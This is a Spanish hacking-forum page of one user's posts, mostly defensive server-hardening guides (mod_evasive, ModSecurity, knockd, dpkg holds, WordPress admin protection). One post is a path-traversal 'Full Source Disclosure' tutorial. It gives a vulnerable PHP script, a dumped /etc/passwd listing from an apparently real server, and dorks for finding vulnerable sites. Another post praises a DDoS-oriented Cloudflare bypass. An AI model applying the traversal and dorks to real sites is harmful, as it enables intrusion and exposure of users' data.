Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - BlackDead

#1
Una denegación de servicio DoS es un tipo de ataque donde se realizan una serie numerosa de peticiones a un servidor con el objetivo de que se sobrecargue atendiéndolas y se colapse.

Una denegación de servicio (DoS) es un tipo de ataque (muy común en ámbitos de servidores web) donde un atacante se encarga de realizar una serie muy numerosa de peticiones a un servidor (usualmente una petición de naturaleza muy costosa) con el objetivo de que se sobrecargue atendiéndolas y se colapse, denegando el servicio a otros posibles usuarios.



Este tipo de ataques, muy simples, no suelen tener mayor gravedad a no ser que se combinen con algún tipo de vulnerabilidad del sistema, ya que como se trata de un único usuario, basta con identificarlo y bloquearlo. Sin embargo, existe otra variante, denegación de servicio distribuida (DDoS) en la que se utiliza el mismo concepto anterior, sólo que esta vez en lugar de tratarse de un sólo atacante se trata de una red distribuida de atacantes (conjunto de usuarios «sincronizados» como uno).



Este último caso si está considerado de los más peligrosos, ya que no se trata de una sola entidad la que intenta atacar, sino de una «flota» de atacantes muy numerosa, en la que un sólo servidor normalmente se desborda al recibir tantas peticiones. Tengamos también en cuenta que, normalmente, estas redes distribuidas están formadas por miles de atacantes, que a su vez son víctimas (usuarios o servidores infectados con troyanos o virus, sin saberlo) que silenciosamente forman parte de botnets. Para intentar frenar estos ataques vamos a utilizar un módulo para Apache llamado mod_evasive. Y digo intentar frenar, porque siempre hay que tener en cuenta cuál es el objetivo del DDoS: Si es provocar una denegación de nuestro servidor web (u otro) nos servirá perfectamente. Si se trata de provocar una denegación de nuestra red local, router u otro elemento relacionado con el flujo de red, de poco nos servirá, ya que el módulo actua a nivel de aplicación. Este módulo se encarga de gestionar una tabla hash con las IPs con accesos más frecuentes al servidor. Así, si detecta un número desmesuradamente alto de peticiones desde una misma IP, las anulará por un tiempo.

Preparación y compilación de mod_evasive

Este módulo es compatible tanto con Apache 1.3 como con Apache 2.0 (además también de iPlanet), sin embargo esta guía está especificada concretamente para Apache en su versión 2.

Descargar mod_evasive: Desde la página oficial de mod_evasive se puede descargar la última versión o desde una terminal escribiendo:

Citarwget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Desempaquetar mod_evasive: Procedemos a desempaquetar el módulo fuente de apache:

Citartar -xzvf mod_evasive_1.10.1.tar.gz

Compilar y obtener el módulo: El paquete de mod_evasive descargado es el código fuente, así que hay que compilarlo para obtener el módulo de Apache. Para ello nos ayudaremos de la utilidad apxs (Apache Extension Tool).

Citarapxs -i -a -c mod_evasive20.c

Si no tienes la utilidad apxs, asegurate e instala el paquete de desarrollo de Apache, Apache-devel, antes. También puedes utilizar el clásico make mediante el fichero Makefile.tmpl. Una vez realizados estos pasos, la compilación nos habrá creado el fichero mod_evasive20.so en nuestra carpeta de módulos de Apache (/usr/lib/httpd/modules).

Instalación y carga de mod_evasive

Comprobar carga de mod_evasive: En una terminal escribimos lo siguiente (NOTA: la carpeta puede variar según la distro de linux)

Citargrep evasive /etc/httpd/httpd.conf

Lo que nos debería devolver algo similar a lo siguiente:

CitarLoadModule evasive20_module /usr/lib/httpd/modules/mod_evasive20.so

Si no es así, debemos incluir dicha linea en el fichero de configuración de Apache, para cargar correctamente el módulo. Incluir configuración mod_evasive: Finalmente, añadimos también la siguiente linea en el fichero anterior

CitarInclude mod_evasive.conf

Creando, por consiguiente, un fichero llamado mod_evasive.conf en la misma carpeta, donde estableceremos las distintas directivas del módulo, que veremos a continuación.

Configuración de mod_evasive

Con la linea vim /etc/httpd/mod_evasive.conf cargaremos el fichero de configuración de nuestro modulo, preparandolo para adaptarlo a nuestro gusto.

CitarDOSHashTableSize 3097 DOSPageCount 2 DOSSiteCount 50 DOSPageInterval 1 DOSSiteInterval 1 DOSBlockingPeriod 10

Esta es la configuración que trae por defecto mod_evasive. Sin embargo, pasaremos a repasar todas las directivas para una mayor personalización.

DOSHashTableSize: Tamaño de la tabla hash que almacenará las IPs (nodos).

Por defecto el valor es de 3097. DOSPageCount / DOSPageInterval: Máximo (umbral) que se debe alcanzar para ser incluído en la lista de bloqueados.

En este caso el objetivo será una página concreta. (Entiendase como «Máximo de DOSPageCount páginas en DOSPageInterval segundos»). Por defecto el máximo está establecido a 2 páginas por segundo.

DOSSiteCount / DOSSiteInterval: Máximo (umbral) que se debe alcanzar para ser incluído en la lista de bloqueados.

En este caso el objetivo será cualquier objeto (imagenes, css...). (Entiendase como «Máximo de DOSSiteCount objetos en DOSSiteInterval segundos»).

Por defecto el máximo está establecido a 50 objetos por segundo. DOSBlockingPeriod: Tiempo en segundos (contador) que permanecerá bloqueada la IP de la lista. Dentro de este periodo, los accesos desde dicha IP obtendrán un error HTTP 403 (prohibido).

En el caso de que la IP intente acceder dentro del periodo de bloqueo, el contador vuelve a ponerse en su valor inicial y tendrá que volver a transcurrir el número de segundos desde el principio de nuevo.

DOSEmailNotify: Opcional. Dirección de email a la que serán enviadas (mediante el comando mail) notificaciones cuando se bloqueen IPs. Incorpora sistema lock para no repetir varios emails y notificar una sola vez.

DOSSystemCommand: Opcional. Comando que será ejecutado cada vez que se añada una IP a la lista. Se reemplazará %s por la IP. De este modo, una buena técnica es hacer lo siguiente:

CitarDOSSystemCommand "/sbin/iptables -I INPUT -p tcp --dport 80 -s %s -j DROP"

Lo que hará que se ejecute el firewall de Linux (iptables) y bloquee todas las peticiones entrantes por el puerto TCP/80 (web). DOSLogDir: Opcional. Selecciona una carpeta como directorio temporal para los logs. Por defecto, si no es especificado, tiene el valor /tmp. DOSWhitelist: Opcional. Incluye una lista blanca para IPs que no tendremos en cuenta para bloquear. Ideal para añadir por ejemplo, el rango de IPs de los bots de Google (rango CIDR 66.249.64.0/19):

CitarDOSWhitelist 66.249.73.*

Puedes usar varias directivas DOSWhitelist y comodin de rangos de hasta los 3 últimos octetos. Finalmente, guardamos el fichero de configuración y reiniciamos el servidor Apache /etc/init.d/httpd restart. Ya tenemos listo el mod_evasive para funcionar.


Testeo de mod_evasive


Citar[...] HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 403 Forbidden HTTP/1.1 403 Forbidden HTTP/1.1 403 Forbidden [...]

A medida que se efectuan las conexiones, se irán sirviendo correctamente, hasta que el mod_evasive detecta que se ha sobrepasado el umbral e incluye la IP local (127.0.0.1) en la lista de bloqueados.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#2
Seguridad web y en servidores / Full Source Disclosure
Agosto 07, 2013, 09:16:30 PM

0×01: Introducción

Full Source Disclosure es una vulnerabilidad que permite descargar cualquier tipo de archivo del servidor/web, permitiendo asi ver el código fuente de la misma web incluyendo los datos de conexión a la DB. Muchas veces se presenta como este ejemplo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

0×02: Explotacion de la vulnerabilidad

Primero procedemos a descargar el archivo vulnerable, para ver su funcionamiento, en primera instancia esto es importante para poder determinar los demas archivos hasta llegar a nuestro objetivo clave, la base de datos.

Código: php
<?
    require ("../Include/PathWeb.php");
    $Archivo     = $_GET["Archivo"];
    $PathCompleto    = $DirWeb."/".$_GET["Path"]."/".$Archivo;

    $file_extension = strtolower(substr(strrchr($Archivo,"."),1));

    switch ($file_extension) {
    case "pdf": $ctype="application/pdf"; break;
    case "exe": $ctype="application/octet-stream"; break;
    case "zip": $ctype="application/zip"; break;
    case "doc": $ctype="application/msword"; break;
    case "xls": $ctype="application/vnd.ms-excel"; break;
    case "ppt": $ctype="application/vnd.ms-powerpoint"; break;
    case "gif": $ctype="image/gif"; break;
    case "png": $ctype="image/png"; break;
    case "jpe": case "jpeg":
    case "jpg": $ctype="image/jpg"; break;
    default: $ctype="application/force-download";
    }
    if (!file_exists($PathCompleto)) die("NO EXISTE EL ARCHIVO: $PathCompleto");

    header("Pragma: public");
    header("Expires: 0″);
    header("Cache-Control: must-revalidate, post-check=0, pre-check=0″);
    header("Cache-Control: private",false);
    header("Content-Type: $ctype");
    header("Content-Disposition: attachment; filename=\"".basename($Archivo)."\";");
    header("Content-Transfer-Encoding: binary");
    header("Content-Length: ".@filesize($PathCompleto));
    set_time_limit(0);
    @readfile("$PathCompleto") or die("Archivo no encontrado.");
    ?>


Como vemos la variable archivo pasa por una mala comprobacion de la misma, por lo tanto podremos bajar y ver el codigo fuente de cualquier archivo que nosotros queramos. Con un poco de ingenio podemos ir buscando por los demas archivos hospedados, vemos que en descargas.php aparece la linea require ("../Include/PathWeb.php"); asi que prodeceremos a descargar ese archivo, buscando un poco encontre un panel de administracion, mire el action del formulario



Si tenemos suerte encontraremos el phpmyadmin y lo demas a imaginacion.

Tambien como dije al principio, pasaria a ser vulnerable el servidor, por lo que si intentamos descargar un archivo de el conociendo su ruta obviamente podremos verlo, como ejemplo tomo el famoso /etc/passwd:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (el famoso ataque '../'):

Citarroot:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/bin/true
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
admin:x:500:500::/home/admin:/bin/bash
majordomo:x:91:91:Majordomo List Manager:/usr/lib/majordomo:/bin/bash
fpweb:x:501:501::/home/fpweb:/bin/bash
tomcat4:x:100:101:Tomcat4:/var/tomcat4:/bin/bash
clamav:x:101:102:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
vhbackup:x:502:502::/home/vhbackup:/bin/bash
admin174:x:504:504::/home/virtual/site174/fst:/bin/false
admin102:x:509:509::/home/virtual/site102/fst:/bin/false
admin289:x:515:515::/home/virtual/site289/fst:/bin/false
admin177:x:518:518::/home/virtual/site177/fst:/bin/false
admin173:x:519:519::/home/virtual/site173/fst:/bin/false
admin18:x:522:522::/home/virtual/site18/fst:/bin/false
admin270:x:525:525::/home/virtual/site270/fst:/bin/false
admin22:x:538:538::/home/virtual/site22/fst:/bin/false
admin234:x:539:539::/home/virtual/site234/fst:/bin/false
admin21:x:540:540::/home/virtual/site21/fst:/bin/false
admin163:x:541:541::/home/virtual/site163/fst:/bin/false
admin235:x:544:544::/home/virtual/site235/fst:/bin/false
admin19:x:547:547::/home/virtual/site19/fst:/bin/false
admin28:x:548:548::/home/virtual/site28/fst:/bin/false
admin11:x:554:554::/home/virtual/site11/fst:/bin/false
admin233:x:555:555::/home/virtual/site233/fst:/bin/false
admin108:x:556:556::/home/virtual/site108/fst:/bin/false
admin30:x:570:570::/home/virtual/site30/fst:/bin/false
admin1:x:575:575::/home/virtual/site1/fst:/bin/false
admin321:x:578:578::/home/virtual/site321/fst:/bin/false
admin192:x:580:580::/home/virtual/site192/fst:/bin/false
admin320:x:595:595::/home/virtual/site320/fst:/bin/false
admin71:x:602:602::/home/virtual/site71/fst:/bin/false
admin41:x:604:604::/home/virtual/site41/fst:/bin/false
admin37:x:606:606::/home/virtual/site37/fst:/bin/false
admin400:x:610:610::/home/virtual/site400/fst:/bin/false
admin91:x:611:611::/home/virtual/site91/fst:/bin/false
admin90:x:612:612::/home/virtual/site90/fst:/bin/false
admin371:x:613:613::/home/virtual/site371/fst:/bin/false
admin45:x:614:614::/home/virtual/site45/fst:/bin/false
admin47:x:616:616::/home/virtual/site47/fst:/bin/false
admin398:x:617:617::/home/virtual/site398/fst:/bin/false
admin379:x:626:626::/home/virtual/site379/fst:/bin/false
admin5:x:627:627::/home/virtual/site5/fst:/bin/false
admin360:x:630:630::/home/virtual/site360/fst:/bin/false
admin407:x:632:632::/home/virtual/site407/fst:/bin/false
admin92:x:634:634::/home/virtual/site92/fst:/bin/false
admin94:x:635:635::/home/virtual/site94/fst:/bin/false
admin7:x:638:638::/home/virtual/site7/fst:/bin/false
admin374:x:647:647::/home/virtual/site374/fst:/bin/false
admin78:x:656:656::/home/virtual/site78/fst:/bin/false
admin365:x:659:659::/home/virtual/site365/fst:/bin/false
admin399:x:660:660::/home/virtual/site399/fst:/bin/false
admin54:x:662:662::/home/virtual/site54/fst:/bin/false
admin52:x:664:664::/home/virtual/site52/fst:/bin/false
admin88:x:665:665::/home/virtual/site88/fst:/bin/false
admin96:x:666:666::/home/virtual/site96/fst:/bin/false
admin74:x:670:670::/home/virtual/site74/fst:/bin/false
admin58:x:672:672::/home/virtual/site58/fst:/bin/false
admin369:x:678:678::/home/virtual/site369/fst:/bin/false
admin50:x:685:685::/home/virtual/site50/fst:/bin/false
admin87:x:686:686::/home/virtual/site87/fst:/bin/false
admin66:x:689:689::/home/virtual/site66/fst:/bin/false
admin67:x:690:690::/home/virtual/site67/fst:/bin/false
admin35:x:691:691::/home/virtual/site35/fst:/bin/false
admin89:x:692:692::/home/virtual/site89/fst:/bin/false
admin72:x:705:705::/home/virtual/site72/fst:/bin/false
admin341:x:706:706::/home/virtual/site341/fst:/bin/false
admin356:x:707:707::/home/virtual/site356/fst:/bin/false
admin357:x:708:708::/home/virtual/site357/fst:/bin/false
admin355:x:709:709::/home/virtual/site355/fst:/bin/false
admin354:x:711:711::/home/virtual/site354/fst:/bin/false
admin53:x:719:719::/home/virtual/site53/fst:/bin/false
admin105:x:725:725::/home/virtual/site105/fst:/bin/false
admin118:x:728:728::/home/virtual/site118/fst:/bin/false
admin124:x:732:732::/home/virtual/site124/fst:/bin/false
admin126:x:734:734::/home/virtual/site126/fst:/bin/false
admin132:x:741:741::/home/virtual/site132/fst:/bin/false
admin133:x:742:742::/home/virtual/site133/fst:/bin/false
admin134:x:743:743::/home/virtual/site134/fst:/bin/false
admin31:x:746:746::/home/virtual/site31/fst:/bin/false
admin14:x:748:748::/home/virtual/site14/fst:/bin/false
admin138:x:756:756::/home/virtual/site138/fst:/bin/false
admin140:x:758:758::/home/virtual/site140/fst:/bin/false
castellanosbk:x:760:760::/home/castellanosbk:/bin/bash
admin70:x:763:763::/home/virtual/site70/fst:/bin/false
admin142:x:764:764::/home/virtual/site142/fst:/bin/false
admin143:x:765:765::/home/virtual/site143/fst:/bin/false
admin86:x:767:767::/home/virtual/site86/fst:/bin/false
admin155:x:780:780::/home/virtual/site155/fst:/bin/false
admin158:x:783:783::/home/virtual/site158/fst:/bin/false
admin125:x:788:788::/home/virtual/site125/fst:/bin/false
admin170:x:794:794::/home/virtual/site170/fst:/bin/false
admin29:x:801:801::/home/virtual/site29/fst:/bin/false
admin148:x:812:812::/home/virtual/site148/fst:/bin/false
admin82:x:814:814::/home/virtual/site82/fst:/bin/false
admin130:x:815:815::/home/virtual/site130/fst:/bin/false
admin179:x:823:823::/home/virtual/site179/fst:/bin/false
admin75:x:829:829::/home/virtual/site75/fst:/bin/false
admin187:x:832:832::/home/virtual/site187/fst:/bin/false
admin188:x:833:833::/home/virtual/site188/fst:/bin/false
admin131:x:837:837::/home/virtual/site131/fst:/bin/false
admin100:x:839:839::/home/virtual/site100/fst:/bin/false
admin129:x:840:840::/home/virtual/site129/fst:/bin/false
admin65:x:845:845::/home/virtual/site65/fst:/bin/false
admin16:x:846:846::/home/virtual/site16/fst:/bin/false
admin81:x:849:849::/home/virtual/site81/fst:/bin/false
admin10:x:850:850::/home/virtual/site10/fst:/bin/false
admin13:x:851:851::/home/virtual/site13/fst:/bin/false
admin48:x:853:853::/home/virtual/site48/fst:/bin/false
admin59:x:856:856::/home/virtual/site59/fst:/bin/false
admin20:x:857:857::/home/virtual/site20/fst:/bin/false
admin63:x:858:858::/home/virtual/site63/fst:/bin/false
admin110:x:864:864::/home/virtual/site110/fst:/bin/false
admin117:x:867:867::/home/virtual/site117/fst:/bin/false
admin139:x:870:870::/home/virtual/site139/fst:/bin/false
admin144:x:871:871::/home/virtual/site144/fst:/bin/false
admin145:x:872:872::/home/virtual/site145/fst:/bin/false
admin146:x:873:873::/home/virtual/site146/fst:/bin/false
admin153:x:876:876::/home/virtual/site153/fst:/bin/false
admin164:x:882:882::/home/virtual/site164/fst:/bin/false
admin107:x:889:889::/home/virtual/site107/fst:/bin/false
admin127:x:890:890::/home/virtual/site127/fst:/bin/false
admin32:x:893:893::/home/virtual/site32/fst:/bin/false
admin68:x:895:895::/home/virtual/site68/fst:/bin/false
admin85:x:897:897::/home/virtual/site85/fst:/bin/false
admin119:x:898:898::/home/virtual/site119/fst:/bin/false
admin3:x:899:899::/home/virtual/site3/fst:/bin/false
admin111:x:901:901::/home/virtual/site111/fst:/bin/false
admin25:x:906:906::/home/virtual/site25/fst:/bin/false
admin73:x:908:908::/home/virtual/site73/fst:/bin/false
admin9:x:911:911::/home/virtual/site9/fst:/bin/false
admin36:x:919:919::/home/virtual/site36/fst:/bin/false
admin101:x:920:920::/home/virtual/site101/fst:/bin/false
admin56:x:923:923::/home/virtual/site56/fst:/bin/false
admin122:x:929:929::/home/virtual/site122/fst:/bin/false
admin2:x:930:930::/home/virtual/site2/fst:/bin/false
admin44:x:933:933::/home/virtual/site44/fst:/bin/false
admin42:x:934:934::/home/virtual/site42/fst:/bin/false
admin79:x:937:937::/home/virtual/site79/fst:/bin/false
admin80:x:938:938::/home/virtual/site80/fst:/bin/false
admin97:x:939:939::/home/virtual/site97/fst:/bin/false
admin113:x:943:943::/home/virtual/site113/fst:/bin/false
admin128:x:947:947::/home/virtual/site128/fst:/bin/false
admin61:x:949:949::/home/virtual/site61/fst:/bin/false
admin137:x:953:953::/home/virtual/site137/fst:/bin/false
admin141:x:954:954::/home/virtual/site141/fst:/bin/false
admin150:x:957:957::/home/virtual/site150/fst:/bin/false
admin152:x:959:959::/home/virtual/site152/fst:/bin/false
admin154:x:960:960::/home/virtual/site154/fst:/bin/false
admin162:x:962:962::/home/virtual/site162/fst:/bin/false
admin165:x:963:963::/home/virtual/site165/fst:/bin/false
admin15:x:964:964::/home/virtual/site15/fst:/bin/false
admin4:x:965:965::/home/virtual/site4/fst:/bin/false
admin17:x:966:966::/home/virtual/site17/fst:/bin/false
admin6:x:967:967::/home/virtual/site6/fst:/bin/false
admin24:x:968:968::/home/virtual/site24/fst:/bin/false
admin34:x:972:972::/home/virtual/site34/fst:/bin/false
admin83:x:973:973::/home/virtual/site83/fst:/bin/false
admin49:x:974:974::/home/virtual/site49/fst:/bin/false
admin27:x:977:977::/home/virtual/site27/fst:/bin/false
admin23:x:978:978::/home/virtual/site23/fst:/bin/false
admin103:x:980:980::/home/virtual/site103/fst:/bin/false
admin60:x:981:981::/home/virtual/site60/fst:/bin/false
admin93:x:983:983::/home/virtual/site93/fst:/bin/false
admin104:x:984:984::/home/virtual/site104/fst:/bin/false
admin55:x:985:985::/home/virtual/site55/fst:/bin/false
admin33:x:986:986::/home/virtual/site33/fst:/bin/false
admin39:x:987:987::/home/virtual/site39/fst:/bin/false
admin38:x:988:988::/home/virtual/site38/fst:/bin/false
admin8:x:989:989::/home/virtual/site8/fst:/bin/false
admin43:x:990:990::/home/virtual/site43/fst:/bin/false
admin51:x:991:991::/home/virtual/site51/fst:/bin/false
admin57:x:992:992::/home/virtual/site57/fst:/bin/false
admin62:x:993:993::/home/virtual/site62/fst:/bin/false
admin95:x:995:995::/home/virtual/site95/fst:/bin/false
admin26:x:996:996::/home/virtual/site26/fst:/bin/false
admin69:x:997:997::/home/virtual/site69/fst:/bin/false
admin40:x:998:998::/home/virtual/site40/fst:/bin/false
admin99:x:999:999::/home/virtual/site99/fst:/bin/false
admin12:x:1000:1000::/home/virtual/site12/fst:/bin/false
admin46:x:1001:1001::/home/virtual/site46/fst:/bin/false
admin76:x:1002:1002::/home/virtual/site76/fst:/bin/false
admin77:x:1003:1003::/home/virtual/site77/fst:/bin/false
admin84:x:1004:1004::/home/virtual/site84/fst:/bin/false
admin98:x:1005:1005::/home/virtual/site98/fst:/bin/false
admin106:x:1006:1006::/home/virtual/site106/fst:/bin/false

0×03: Dorks mas comunes

inurl:download.php?file=
inurl:download.php?path=
inurl:download.php?song=
inurl:descarga.php?archivo=
inurl:descarga.php?file=
inurl:descarga.php?arc=
inurl:download.php?*=*.doc
#3
Bugs y Exploits / Re:Bypass Cloudflare (2 metodos)
Agosto 07, 2013, 07:21:06 PM
esta muy bueno a la hora de hacer los pequeños ataques conocidos como ddos
#4
Por fin se ha publicado de forma oficial la extensión de ModSecurity para IIS. Ya hemos hablado en varias ocasiones sobre el módulo ModSecurity para Apache así que si revisáis la etiqueta modsecurity podréis investigar un poquito más sobre sus posibilidades. Básicamente se trata de una capa de protección a nivel de aplicación (capa 7) que permite detectar y parar todo tipo de intrusiones como cross-site scripting, cross-site request forgery, sql injection, XSS injection, etc.

El módulo fue presentado hace unos días en el Black Hat de Las Vegas y actualmente está disponible una versión RC para su descarga. Sigue siendo open source y su código está disponible, aunque Microsoft no recomienda modificar los binarios a no ser que sea para desarrollarlo o búsqueda de mejoras... La instalación se puede hacer sencillamente a través de un instalador MSI, está disponible para IIS 7.

Más información: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



DESCARGA: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#5
Seguridad / Port knocking en Debian con knockd
Agosto 07, 2013, 04:50:50 PM
El golpeo de puertos (del inglés port knocking) es un mecanismo para abrir puertos externamente en un firewall mediante una secuencia preestablecida de intentos de conexión a puertos que se encuentran cerrados. Una vez que el firewall recibe una secuencia de conexión correcta, sus reglas son modificadas para permitir al host que realizó los intentos conectarse a un puerto específico.

El propósito principal del golpeo de puertos es prevenir un escanéo de puertos por parte de un atacante que busca posibles servicios vulnerables. Como los mismos solo se abren ante un golpeo de puertos correcto. Normalmente los puertos donde se brindan los servicios se muestran aparentemente cerrados.



Una vez que sabemos qué es el Port knocking y sus utilidades, vamos a ver el modo de instalarlo y utilizarlo, tanto en modo servidor como cliente. Para ello podemos hacer uso de varias herramientas, una de ellas es knockd, que incluye tanto el demonio (Servidor) como el cliente así que será lo que instalemos en ambas partes.

Los paquetes precompilados y código fuente se pueden descargar desde el sitio de knockd, para Debian y derivados podemos instalarlo directamente desde los repositorio

Citar$ sudo apt-get install knockd

Una vez instalado, la configuración básica, requiere por un lado habilitar el servicio (que no arrancarlo), para ello debemos modificar la variable START_KNOCKD de 0 a 1 en el fichero /etc/default/knockd. Veréis que al instalar os ha indicado lo siguiente:

Citar* knockd disabled: not starting. To enable it edit /etc/default/knockd

Ese fichero tiene dos variables, una la comentada y la otra en la que especificamos la interfaz de red en la que escuchará knockd y cualquier otro parámetro que queramos pasar al demonio:

Citar################################################
#
# knockd's default file, for generic sys config
#
################################################

# control if we start knockd at init or not
# 1 = start
# anything else = don't start
#
# PLEASE EDIT /etc/knockd.conf BEFORE ENABLING
START_KNOCKD=1

# command line options
KNOCKD_OPTS="-i eth1"

Y el otro fichero de configuración es en el que especificamos las opciones de logging y las secuencias que queramos configurar para abrir y cerrar puertos, es el fichero /etc/knockd.conf. Vemos que por defecto estamos mandando los logs a syslog y que hay dos secuencias, una para abrir el puerto 22 (SSH) para una IP y otra para cerrarla. La primera con la secuencia de puertos TCP 7000,8000 y 9000 y la segunda a la inversa:

Citar
[options]
   UseSyslog

[openSSH]
   sequence    = 7000,8000,9000
   seq_timeout = 5
   command     = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
   tcpflags    = syn

[closeSSH]
   sequence    = 9000,8000,7000
   seq_timeout = 5
   command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
   tcpflags    = syn

Esta es la configuración por defecto, si quisiéramos probarla podemos arrancar el demonio (/etc/init.d/knockd start) o ejecutarlo manualmente ampliando el debug y ver directamente en STDOUT el funcionamiento. Voy a probarlo en local contra la interfaz "lo" y añadiendole verbose:

Citar# knockd -i lo -v
listening on lo...

En el lado del cliente utilizaremos el comando "knock", es tan sencillo como pasarle la IP seguida de los puertos y el protocolo (si es tcp no hace falta ponerlo). Para nuestro caso anterior, si quisieramos abrir el puerto 22 para nuestra IP haríamos lo siguiente

Citar$ knock localhost 7000 8000 9000

Y una vez ejecutado veremos en el log o en STDOUT si lo hemos ejecutado a mano:

Citar127.0.0.1: openSSH: Stage 1
127.0.0.1: openSSH: Stage 2
127.0.0.1: openSSH: Stage 3
127.0.0.1: openSSH: OPEN SESAME
openSSH: running command: /sbin/iptables -A INPUT -s 127.0.0.1 -p tcp --dport 22 -j ACCEPT

Y para cerrarlo:

Citar$ knock localhost 9000 8000 7000

Y el log:

Citar127.0.0.1: closeSSH: Stage 1
127.0.0.1: closeSSH: Stage 2
127.0.0.1: closeSSH: Stage 3
127.0.0.1: closeSSH: OPEN SESAME
closeSSH: running command: /sbin/iptables -D INPUT -s 127.0.0.1 -p tcp --dport 22 -j ACCEPT

A partir de aquí conviene investigar ya que las posibilidades son infinitas, jugando con las secuencias de puertos, flags tcp (syn, ack...), timeouts de secuencias, comandos a ejecutar, etc. Os recomiendo esta entrada de Kriptopolis donde profundizan más en sus posibilidades.
#6

Gracias al gestor de paquetes de Debian dpkg podemos bloquear/retener la actualización de paquetes que nos interesa mantener en una versión concreta. Para ello haremos uso del comando dpkg junto con los parámetros get-selections y set-selections.

Con get-selections podemos ver el estado de todos los paquetes instalados del sistema, veremos que si se permite su actualización estarán en estado "install" y si están bloqueados veremos "hold"

De este modo veremos el estado de todos los paquetes:

Citar~$ dpkg --get-selections

Pero podemos filtrar directamente el paquete que nos interesa:

Citar~$ dpkg --get-selections firefox
firefox                  install

Si por ejemplo quisieramos evitar que firefox se actualizara haríamos lo siguiente:

Citar~$ echo "firefox hold" | sudo dpkg --set-selections

Veis que especificamos paquete + estado. Ahora firefox ya estaría hold:

Citar~$ dpkg --get-selections firefox
firefox                  hold

Si ahora hicieramos una actualización del sistema veríamos que el paquete firefox se retiene y no se permite su actualización:

Citar~$ sudo apt-get upgrade
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages have been kept back:
  firefox firefox-global

Y para volver a permitir su instalación:

Citar~$ echo "firefox install" | sudo dpkg --set-selections
#7

Siguiendo un poquito con la temática WordPress hoy quería tratar el tema de la securización del acceso a la zona de administración. Tiene lógica que al tratarse de la puerta de entrada a toda la gestión de nuestro sitio queramos tenerla lo más securizada posible.

Por defecto, la entrada a la zona de administración (ejemplo.com/wp-admin/) tiene un sistema de autenticación interno de WordPress que funciona contra la base de datos. El administrador, por defecto accede con el usuario "admin", si dejamos este valor por defecto, el atacante ya tiene el punto de partida para intentar acceder. Por este motivo se recomienda:

Establecer una clave lo suficientemente compleja para el usuario administrador.
Cambiar el nombre del usuario administrador de "admin" a uno personalizado. Para ello podemos usar el plugin WP-Optimize, que además nos sirve para otras cosas como mantener optimizada y limpia la base de datos. Si no queremos instalar el plugin, bastará con crear un nuevo usuario con rol de administrador y posteriormente borrar el original "admin". Ojo, con esta última opción no borréis los artículos de "admin", sino asociarlos al nuevo usuario. También se podría cambiar directamente en la base de datos, desde la shell de MySQL o phpMyAdmin.
Una vez que nuestro usuario administrador está securizado, lo mejor es proceder a añadir una segunda capa de autenticación para la ruta wp-admin, de modo que lo primero que se encuentre el atacante sea la barrera de autenticación básica de Apache, y en el hipotético caso de que la sobrepasara tuviera que enfrentarse también a la de WordPress.

Lo que hacemos entonces es crear, vía el fichero .htaccess dentro de la carpeta "wp-admin" una capa de autenticación. Creamos el fichero con el siguiente contenido:

CitarAuthName "Acceso restringido"
AuthUserFile /home/foo/bar/.htpasswd
AuthType basic
require user miusuario

Nota importante: El fichero .htpasswd, que contendrá los usuarios y passwords con acceso autorizado, debe ubicarse fuera de la ruta pública del sitio web. Podemos añadir los usuarios al mismo desde línea de comandos con el comando htpasswd:
Citar# htpasswd -cb /home/foo/bar/.htpasswd  miusuario mipassword

En este ejemplo, nos generaría el fichero .htpasswd siguiente:

Citar# cat .htpasswd
miusuario:ktRS/8rW/AFm3as3l0/Y

Si no disponéis de un equipo Unix con el comando htpasswd, podéis usar cualquiera de las webs que permiten generar este fichero a través de asistentes.

